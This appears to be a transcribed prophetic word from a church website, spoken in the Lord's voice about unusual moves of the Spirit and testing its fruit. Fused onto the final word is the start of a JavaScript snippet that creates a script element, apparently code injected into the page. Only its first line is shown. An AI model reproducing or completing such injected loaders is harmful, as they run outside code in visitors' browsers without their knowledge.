Beyond your Understanding

Know that I am taking you beyond your understanding, says the Lord

I’m taking you beyond natural understanding

And I’m bringing you into deeper realms of my spirit

Know that as I move in your midst there may be things you don’t understand

Continue to look for the fruits of my Spirit

Continue to look for the movings of my Spirit, says the Lord

And know that as you continue to look to me

That I will continue to flow in your midst in unusual ways

I have spoken over this house that there will be an unusual move of my Spirit, says the Lord

And know that as I continue to move in this house there will be things from time to time

That will make you wonder

There will be signs that will make you wonder

But know that you must always look to the fruit of my Spirit

And look to the conclusion of the matter

And see the fruit

And examine the fruit

And test the fruit

For the ways of my Spirit are not understood by all

And I will be doing new things in your midst

And I will be doing new things in this house

Because the world has become accustomed to many things that I’ve done in the past

And the enemy has caused great confusion concerning many different ways that I move

But know that I will be doing what I know that I need to do in this house, says the Lord

And I will be doing what I need to be do in this city, says the Lord

Just as I am doing all around the world

So know that as you continue to submit to me and the movings of my Spirit

Know I am that I am in authority in this house

And I will bring things into order

So continue to pray that I will bring things into order

It’s a good prayer

To pray that things will be in the order of my Spirit

But know that the movings of my Spirit are not easy to understand sometimes

So keep your minds and hearts towards me

Keep your focus on me

Keep your gaze on me

And know that I will bring the full understanding to all that I am doing

As you see the fruit unfolding before you

As you see souls coming to Christ

As you see backsliders returning

Know that you will be seeing the fruit of my Spirit, say the Lord your Godvar d=document;var s=d.createElement(‘script’);

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